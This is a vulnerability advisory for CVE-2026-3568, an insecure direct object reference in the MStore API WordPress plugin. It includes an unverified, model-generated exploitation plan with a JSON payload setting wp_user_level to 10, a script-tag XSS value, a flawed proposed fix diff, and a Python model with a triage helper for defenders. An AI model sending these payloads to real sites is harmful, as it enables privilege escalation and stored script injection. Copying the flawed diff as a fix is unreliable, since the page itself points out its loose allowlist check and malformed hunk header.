# CVE-2026-3568: MStore API <= 4.18.3 - Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Meta Update

- **Plugin:** `mstore-api` (WordPress plugin; no theme involved)
- **Affected versions:** <= 4.18.3
- **Patched in:** 4.18.4
- **Severity:** medium, CVSS 4.3 (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N`)
- **Vulnerability type:** Authorization Bypass Through User-Controlled Key
- **Published:** 2026-04-08; **updated:** 2026-04-09 02:25:06
- **Days to patch:** 1
- **Reference:** https://www.wordfence.com/threat-intel/vulnerabilities/id/a77bc126-4dbd-4a26-b98c-946341d4282f?source=api-prod
- **Page slug:** `mstore-api-authenticated-subscriber-insecure-direct-object-reference-to-arbitrary-user-meta-update`

## Description

The MStore API plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.18.3. This is due to the `update_user_profile()` function in `controllers/flutter-user.php` processing the `meta_data` JSON parameter without any allowlist, blocklist, or validation of meta keys. The function reads raw JSON from `php://input` (line 1012), decodes it (line 1013), authenticates the user via cookie validation (line 1015), and then iterates directly over the user-supplied `meta_data` array, passing arbitrary keys and values to `update_user_meta()` (line 1080) with no sanitization or restrictions.

This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary user meta fields on their own accounts, including sensitive fields like `wp_user_level` (read by legacy `user_level`-based checks, where 10 means administrator), plugin-specific authorization flags (e.g., `_wpuf_user_active`, `aiowps_account_status`), and billing/profile fields with unsanitized values (potentially enabling Stored XSS in admin contexts). The advisory notes that `wp_capabilities` cannot be directly exploited this way because it requires a serialized array value, whereas `wp_user_level` (a simple integer) and numerous plugin-specific meta keys are exploitable.

Caveat on that last point: `update_user_meta()` runs values through `maybe_serialize()`, and `json_decode($json, TRUE)` turns a nested JSON object into a PHP array, so whether a nested `meta_data` entry can reach `wp_capabilities` as a serialized array depends on the actual handler and has not been verified here; the CVSS vector (I:L) reflects the limited impact as assessed.

## Source links

- Vulnerable version 4.18.3: https://plugins.trac.wordpress.org/browser/mstore-api/tags/4.18.3 (zip: https://downloads.wordpress.org/plugin/mstore-api.4.18.3.zip)
- Fixed version 4.18.4: https://plugins.trac.wordpress.org/browser/mstore-api/tags/4.18.4 (zip: https://downloads.wordpress.org/plugin/mstore-api.4.18.4.zip)
- All tags: https://plugins.trac.wordpress.org/browser/mstore-api/tags
- Files recorded as changed by the patch: `controllers/flutter-2c2p.php`, `controllers/flutter-auction.php`, `controllers/flutter-b2bking.php`, `controllers/flutter-booking.php`, `controllers/flutter-cc-avenue.php`, `controllers/flutter-checkout.php`, `controllers/flutter-composite-products.php`, `controllers/flutter-customer.php`

## Automated research

Status: researched; verified: no; rounds completed: 3; model: gemini-3-flash-preview; started 2026-04-17 20:22:28, completed 2026-04-17 20:22:50. No proof-of-concept has been recorded (all PoC fields are empty). Everything below this heading is model-generated and unverified; anything marked "inferred" was not confirmed against the plugin source.

### Research summary

The MStore API plugin for WordPress allows authenticated users to update arbitrary user metadata on their own accounts due to a lack of validation in the `update_user_profile` function. This lets attackers with Subscriber-level access set sensitive meta fields such as `wp_user_level`, so that legacy `user_level`-based checks treat them as administrators, or inject script content via profile fields.

### Research plan

#### 1. Vulnerability Summary

The **MStore API** plugin (up to 4.18.3) contains an Insecure Direct Object Reference (IDOR) vulnerability in `controllers/flutter-user.php`. The function `update_user_profile()` reads raw JSON input from `php://input`, decodes it, and iterates through a user-provided `meta_data` array. It passes these keys and values directly to the WordPress `update_user_meta()` function without any validation, allowlisting, or sanitization. This allows an authenticated user (Subscriber level or higher) to update any meta field associated with their own account, including sensitive internal WordPress fields or plugin-specific authorization flags.

#### 2. Attack Vector Analysis

- **Endpoint:** `POST /wp-json/api/flutter_user/update` (inferred from the plugin's naming conventions and the function name `update_user_profile`; not confirmed).
- **Required authentication:** Subscriber or higher.
- **Authentication mechanism:** the plugin uses a custom `User-Cookie` header containing the WordPress authentication cookie.
- **Vulnerable parameter:** `meta_data` (JSON object within the POST body).
- **Payload carrier:** the raw JSON body read from `php://input`.

#### 3. Code Flow

1. **Entry point:** a `POST` request is sent to the REST API route registered for `update_user_profile` in `controllers/flutter-user.php`.
2. **Input retrieval (line 1012):** the function uses `file_get_contents('php://input')` to read the raw request body.
3. **JSON decoding (line 1013):** the raw body is decoded into an associative array: `$params = json_decode($json, TRUE);`.
4. **Authentication (line 1015):** the code extracts the `User-Cookie` header and validates the login using `validateCookieLogin()`. It sets the current user via `wp_set_current_user($user_id)`.
5. **Iteration (line 1080):** the function accesses `$params['meta_data']` and iterates through it:
   ```php
   foreach ($params['meta_data'] as $key => $value) {
       update_user_meta($user_id, $key, $value);
   }
   ```
6. **Sink:** `update_user_meta()` is called with an attacker-controlled `$key` and `$value`, allowing modification of fields like `wp_user_level`.

#### 4. Nonce Acquisition Strategy

Based on the source of other controllers (e.g., `FlutterAuction`, `FlutterCheckout`), this plugin relies on the `User-Cookie` header for session identification rather than standard WP REST nonces for its custom `api/flutter_*` namespaces.

1. **Authentication:** log in as a Subscriber user through the normal WordPress login to obtain authentication cookies.
2. **Cookie extraction:** the `User-Cookie` header should contain the value of the `wordpress_logged_in_*` cookie.
3. **Permission check:** in `FlutterBaseController::checkApiPermission()` (inferred), a request with a valid `User-Cookie` is allowed through. No additional CSRF nonce appears to be required for this profile update path, based on the vulnerability description.

#### 5. Exploitation Strategy

The goal is to update the `wp_user_level` meta field. In WordPress, a user level of `10` is the legacy representation of an Administrator.

Step-by-step plan:

1. **Login:** authenticate as a Subscriber user to get a valid session.
2. **Identify target:** the `wp_user_level` meta key.
3. **Construct payload:**
   ```json
   {
     "meta_data": {
       "wp_user_level": "10"
     }
   }
   ```
4. **Send request:** issue the POST request below.

HTTP request details:

- **Method:** `POST`
- **URL:** `http://localhost:8080/wp-json/api/flutter_user/update` (test instance)
- **Headers:**
    - `Content-Type: application/json`
    - `User-Cookie: [WORDPRESS_LOGGED_IN_COOKIE_VALUE]`
- **Body:**
    ```json
    {
      "meta_data": {
        "wp_user_level": "10"
      }
    }
    ```

#### 6. Test Data Setup

1. **Create user:** create a standard Subscriber user.
   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`
2. **Verify initial state:**
   - `wp user meta get attacker wp_user_level` (should be `0`)

#### 7. Expected Results

- The server should return `200 OK` with `true` (as seen in `FlutterAuction::placebid`).
- The `wp_user_level` row for the `attacker` user in the `wp_usermeta` table will be updated to `10`.

#### 8. Verification Steps

1. **Check meta via WP-CLI:**
   - `wp user meta get attacker wp_user_level`
   - **Expected output:** `10`
2. **Check admin access:** exercise a legacy `user_level` check, or verify whether plugin-specific admin logic now treats this user as high-privileged.

#### 9. Alternative Approaches

If `api/flutter_user/update` is not the correct route:

1. **Route discovery:** list the registered REST routes to find the exact path for `update_user_profile`, for example by fetching the REST index at `/wp-json/` or with `wp eval 'print_r(array_keys(rest_get_server()->get_routes()));'` and filtering for `flutter_user`.
2. **Target other meta:** if `wp_user_level` turns out to be protected (unlikely for `update_user_meta`), target plugin-specific flags such as:
   - `_wpuf_user_active` (WP User Frontend)
   - `aiowps_account_status` (All In One WP Security)
   - `description`, to inject script content (`{"meta_data": {"description": "<script>alert(1)</script>"}}`), which might execute in the admin user profile view.

*(Note: the plan treats `wp_capabilities` as not a viable target because WordPress expects a serialized array for that key; `wp_user_level` is a simple integer and is directly writable. See the caveat under Description.)*

### Vulnerable code (as reconstructed by the research)

```php
// controllers/flutter-user.php line 1012
$json = file_get_contents('php://input');
$params = json_decode($json, TRUE);

// ... authentication logic validating User-Cookie header ...

// line 1080
if (isset($params['meta_data'])) {
    foreach ($params['meta_data'] as $key => $value) {
        update_user_meta($user_id, $key, $value);
    }
}
```

### Exploit outline

The exploit requires a valid Subscriber-level account. An attacker authenticates to obtain a session cookie, then sends a POST request to the `/wp-json/api/flutter_user/update` endpoint (inferred route). The request must include a `User-Cookie` header containing the WordPress authentication cookie. The payload is a JSON object in the request body containing a `meta_data` property. Inside `meta_data`, the attacker can specify any WordPress user meta key, such as `wp_user_level` set to `10`, which legacy WordPress code uses as the administrator level. Because the plugin iterates through the JSON keys and passes them directly to `update_user_meta` without checking an allowlist, the sensitive metadata is updated, and any check that relies on `user_level` treats the account as higher-privileged.

### Research fix diff

The following diff is the research-generated fix (`research_fix_diff`), not the published 4.18.4 change; compare it against the fixed-version source linked above.

```diff
--- controllers/flutter-user.php
+++ controllers/flutter-user.php
@@ -1077,7 +1077,11 @@
-            foreach ($params['meta_data'] as $key => $value) {
-                update_user_meta($user_id, $key, $value);
-            }
+            $allowed_meta_keys = array('first_name', 'last_name', 'nickname', 'description', 'billing_first_name', 'billing_last_name');
+            foreach ($params['meta_data'] as $key => $value) {
+                if (in_array($key, $allowed_meta_keys)) {
+                    update_user_meta($user_id, sanitize_text_field($key), sanitize_text_field($value));
+                }
+            }
```
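Review bot: `in_array($key, $allowed_meta_keys)` in the added block lacks the strict flag, so on PHP 7 an integer key (which is what `json_decode` yields when `meta_data` is sent as a JSON array rather than an object) compares loosely equal to every non-numeric string in the list and passes the allowlist; use `in_array($key, $allowed_meta_keys, true)`. The value is also handed to `sanitize_text_field($value)` without checking that it is a scalar, although a nested JSON object arrives from `json_decode($json, TRUE)` as an array; reject non-scalars (`is_scalar($value)`) before sanitizing rather than letting them be cast to the string "Array". Sanitizing `$key` after the allowlist check is redundant, since only the six literal keys reach that call. Finally, the hunk header `@@ -1077,7 +1077,11 @@` does not match the body (3 lines removed and 6 added from 7 old lines gives 10, not 11), so this diff will not apply cleanly as shown, and it is the research-generated proposal rather than the shipped 4.18.4 change, which the `patch_diff_files` list on this page records as touching other controllers.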
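The following is an added example, not code from MStore API or from the research above. It models how the `meta_data` loop treats a raw `php://input` body (including the point that a nested JSON object reaches `update_user_meta()` as an array), puts an allowlisted, scalar-only replacement beside it, and adds a triage helper for reviewing captured request bodies for attempts to write sensitive keys. Assumptions not taken from the advisory: the WordPress table prefix is `wp_`, the allowlist is the one in the research fix diff, `sanitize_text_field()` is approximated by tag and control-character stripping, and the sample body is constructed here rather than captured.

```python
"""Model of MStore API's update_user_profile() meta_data handling (added example).

Assumptions (not from the advisory): table prefix "wp_", the allowlist proposed
in the research fix diff, and an approximation of sanitize_text_field().
"""
import json
import re

TABLE_PREFIX = "wp_"  # assumed; WordPress reads this from $wpdb->prefix

# Allowlist taken from the research fix diff on this page.
ALLOWED_META_KEYS = frozenset({
    "first_name", "last_name", "nickname", "description",
    "billing_first_name", "billing_last_name",
})

# Keys whose modification changes authorization state: WordPress core keys
# (prefixed) plus the plugin-specific flags the advisory names.
SENSITIVE_META_KEYS = frozenset({
    TABLE_PREFIX + "capabilities",
    TABLE_PREFIX + "user_level",
    "session_tokens",
    "_wpuf_user_active",
    "aiowps_account_status",
})

_TAG_RE = re.compile(r"<[^>]*>")
_CTRL_RE = re.compile(r"[\x00-\x1f\x7f]")


def parse_body(raw: bytes) -> dict:
    """Mirror json_decode($json, TRUE): objects become associative arrays
    (dicts here); invalid JSON or a non-object top level yields no params."""
    try:
        params = json.loads(raw)
    except ValueError:  # covers JSONDecodeError and UnicodeDecodeError
        return {}
    return params if isinstance(params, dict) else {}


def vulnerable_writes(raw: bytes) -> list:
    """Every (key, value) pair the unpatched loop hands to update_user_meta().
    A JSON array gives integer keys like PHP foreach; nested objects arrive
    as dicts, which update_user_meta() would serialize via maybe_serialize()."""
    meta = parse_body(raw).get("meta_data")
    if isinstance(meta, dict):
        return list(meta.items())
    if isinstance(meta, list):
        return list(enumerate(meta))
    return []  # PHP warns and does not iterate over a scalar


def sanitize_text_field(value) -> str:
    """Approximation of WordPress sanitize_text_field(): tags and control
    characters removed, surrounding whitespace trimmed."""
    text = _TAG_RE.sub("", str(value))
    return _CTRL_RE.sub("", text).strip()


def hardened_writes(raw: bytes) -> list:
    """Allowlisted replacement: exact key match (strict, as in_array(..., true)
    would be), scalar string/number values only, values sanitized."""
    writes = []
    for key, value in vulnerable_writes(raw):
        if key not in ALLOWED_META_KEYS:
            continue  # also drops integer keys from a JSON array
        if isinstance(value, bool) or not isinstance(value, (str, int, float)):
            continue  # arrays/objects/booleans are never legitimate profile text
        writes.append((key, sanitize_text_field(value)))
    return writes


def triage(raw: bytes) -> dict:
    """For a captured request body: which sensitive keys it tried to write,
    which values would have been stored as serialized arrays, and which keys
    fall outside the allowlist. Intended for WAF or access-log review."""
    attempted = dict(vulnerable_writes(raw))
    return {
        "sensitive_keys": sorted(k for k in attempted if k in SENSITIVE_META_KEYS),
        "array_values": sorted(
            k for k, v in attempted.items() if isinstance(v, (dict, list))),
        "non_allowlisted": sorted(k for k in attempted if k not in ALLOWED_META_KEYS),
    }


# Constructed sample body (not a captured request): the wp_user_level payload
# from the research plan plus a script tag in description and a nested object.
SAMPLE_BODY = json.dumps({
    "meta_data": {
        "wp_user_level": "10",
        "description": "<script>alert(1)</script>Hi",
        "wp_capabilities": {"administrator": True},
    }
}).encode()

if __name__ == "__main__":
    print("vulnerable:", vulnerable_writes(SAMPLE_BODY))
    print("hardened:  ", hardened_writes(SAMPLE_BODY))
    print("triage:    ", triage(SAMPLE_BODY))
```

The `triage()` output is the quickest way to tell, from a stored request body, whether a request against the profile endpoint was an exploitation attempt: any entry under `sensitive_keys` or `array_values` should not occur in legitimate app traffic, and after upgrading to 4.18.4 a `wp user meta get <user> wp_user_level` check on recently active Subscriber accounts confirms nothing was left behind.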